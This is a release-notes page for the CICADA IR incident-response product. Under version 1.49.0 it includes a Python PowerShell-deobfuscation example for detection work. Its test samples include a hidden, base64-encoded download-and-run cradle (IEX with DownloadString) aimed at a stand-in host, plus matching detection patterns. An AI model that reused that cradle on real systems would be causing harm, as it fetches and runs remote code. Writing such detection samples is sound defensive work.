What's New

Release highlights for recent CICADA IR versions. Current version: 1.51.0


1.51.0

  • Improved investigation completion workflow — clearer status progression from collection through to final report
  • Enhanced licence key security with stronger activation signatures
  • Console banner improvements for VM startup

1.50.0

Feature gating, tiered reporting & community trial

  • Tiered reporting — Investigation reports (executive summary, technical, MITRE mapping, blast radius, attack path, AI-enhanced) available at Professional tier. Compliance & legal reports (NDB, insurance, legal hold, regulatory, client exposure, executive briefing, IR playbook, post-incident review) available at Enterprise tier.
  • Community trial — 14-day free trial with download link delivered by email. No credit card required.
  • Active Directory moved to the free tier — all users can now connect to on-prem AD out of the box.
  • Source connectors and LLM providers are now gated by tier — locked features show a clear disabled state with upgrade prompts.

1.49.0

Behavioral engine hardening

  • Major accuracy improvements to the deterministic behavioral scoring engine — fewer false positives from service accounts, SYSTEM log operations, and correlated weak signals.
  • PowerShell deobfuscation — detects encoded commands, backtick escapes, and character array obfuscation before pattern matching.
  • New detection patterns: WinRM lateral movement, slow-and-low brute force, slow lateral movement campaigns.
  • Validated against a 16-scenario test suite covering true positives, false positives, and evasion techniques.
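As an added illustration of the normalisation step this release describes (example code written for this page, not CICADA IR's own engine): a small Python normaliser that decodes -EncodedCommand payloads, resolves backtick escapes and rebuilds [char]-array strings before indicator patterns are applied. The pattern list and the sample command lines are constructed for the demonstration.

```python
import base64
import re

# Backtick escapes with a meaning of their own; any other backtick just yields the next character.
_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0", "a": "\a", "b": "\b", "f": "\f", "v": "\v"}
# Illustrative indicators, matched only after normalisation (hypothetical, not the product's pattern set).
PATTERNS = [r"invoke-expression", r"\biex\b", r"downloadstring", r"frombase64string"]

def decode_encoded_command(cmd: str) -> str:
    """Replace a -EncodedCommand / -enc / -e <base64> argument with its UTF-16LE plaintext."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmd, re.IGNORECASE)
    if not m:
        return cmd
    try:
        plain = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # not valid base64/UTF-16: leave the line untouched rather than guess
        return cmd
    return cmd[:m.start()] + plain + cmd[m.end():]

def strip_backticks(cmd: str) -> str:
    """Resolve backtick escapes: I`EX becomes IEX, while `n still means a newline."""
    return re.sub(r"`(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), cmd)

def resolve_char_arrays(cmd: str) -> str:
    """Rebuild strings built from codes: [char]73+[char]69+[char]88 or -join [char[]](73,69,88)."""
    def codes(s: str) -> str:
        return "".join(chr(int(n)) for n in re.findall(r"\d+", s))
    cmd = re.sub(r"-join\s*(\()?\s*\[char\[\]\]\s*\(([\d,\s]+)\)(?(1)\s*\))",
                 lambda m: codes(m.group(2)), cmd, flags=re.IGNORECASE)
    return re.sub(r"(?:\[char\]\d+\s*\+\s*)*\[char\]\d+", lambda m: codes(m.group(0)), cmd, flags=re.IGNORECASE)

def normalise(cmd: str) -> str:
    """Decode, unescape, rebuild (in that order: decoded text may itself be obfuscated), then lowercase."""
    return resolve_char_arrays(strip_backticks(decode_encoded_command(cmd))).lower()

def match_patterns(cmd: str, normalise_first: bool = True) -> list:
    """Return the patterns that hit; with normalise_first=False the raw line is matched for comparison."""
    text = normalise(cmd) if normalise_first else cmd.lower()
    return [p for p in PATTERNS if re.search(p, text)]

# Constructed samples (not from any real incident): one benign line and three obfuscated forms.
_INNER = "I`EX (New-Object Net.WebClient).Download`String('http://example.invalid/a.ps1')"
SAMPLES = {
    "benign": "powershell -Command Write-Host hello",
    "encoded": "powershell -nop -w hidden -EncodedCommand " + base64.b64encode(_INNER.encode("utf-16-le")).decode(),
    "backtick": 'powershell -c "Invoke-Ex`pression (Get-Content x.ps1)"',
    "chararray": 'powershell -c "& (-join [char[]](73,69,88)) ([char]36+[char]115)"',
}

if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(f"{name:9s} raw={match_patterns(line, False)} normalised={match_patterns(line)}")
```

Run stand-alone, the script shows that none of the obfuscated samples hit a pattern on the raw line, and all three do after normalisation.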

1.48.0

Ubiquiti UCG firewall integration & source selection redesign

  • Ubiquiti UniFi Console Gateway integration — collect firewall logs, block/unblock IPs via CICADA-BLOCKLIST firewall group. Supports API key and session-based authentication.
  • Source selection at investigation creation — when creating a new investigation, you now choose which data sources to import upfront. No more sources appearing automatically.

1.47.0

Correlation engine & detection coverage expansion

  • Correlation engine — individual detections now aggregate into entity-level correlated findings. Risk-based alerting escalates severity when multiple MITRE tactics are observed for the same entity.
  • 12 attack chain templates — temporal sequence matching for common attack flows: credential dump → lateral movement, brute force → compromise, full kill chain, DCSync + Golden Ticket, ransomware precursors, and more.
  • 17 new Windows Event IDs — domain policy changes, Zerologon/Netlogon, LSASS dump via SilentProcessExit, PowerShell pipeline, MSSQL xp_cmdshell, BITS persistence, Credential Manager, and more.
  • Evidence Events tab — search by entity name to see all normalised evidence events in which that entity appears as actor or target.
  • Improved Defender alert parsing — process command lines, URL evidence, and registry evidence now extracted from alerts.
  • Noise reduction — successful auth IPs no longer create spurious IOCs, SHA1/MD5 duplicates removed, system accounts filtered from blast radius.

For the full changelog including all bug fixes and technical details, contact support@cicada-ir.ai.